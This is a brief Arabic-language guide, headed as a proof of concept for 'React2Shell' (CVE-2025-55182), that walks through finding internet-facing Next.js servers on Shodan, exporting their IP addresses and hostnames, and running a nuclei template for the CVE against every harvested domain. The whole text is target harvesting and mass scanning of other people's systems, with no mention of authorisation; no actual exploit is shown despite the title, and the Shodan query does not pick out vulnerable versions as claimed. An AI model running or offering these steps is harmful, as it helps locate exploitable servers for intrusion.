
PoC، استكشاف React2Shell عن CVE-2025-55182
انتقل إلى Shodan.
في شريط البحث، أدخل الاستعلام التالي للعثور على الأجهزة التي تشغل الإصدار الضعيف من إطار عمل Next.js:
http.component:"Next.js" 200

قم بتنزيل نتائج البحث في الطرفية باستخدام واجهة سطر الأوامر Shodan CLI:
shodan download nextjs_vuln "http.component:'Next.js' 200"

قم بتصفية النتائج لتحديد النطاقات وعناوين IP التي تشغل الإصدار الضعيف من Next.js:
shodan parse --fields ip_str nextjs_data.json.gz > ips.txt
shodan parse --fields hostnames nextjs_data.json.gz > domains.txt


استخدام nuclei لفحص الثغرة:
cat domains.txt | nuclei -t ./nuclei-templates/http/cves/2025/CVE-2025-55182.yaml
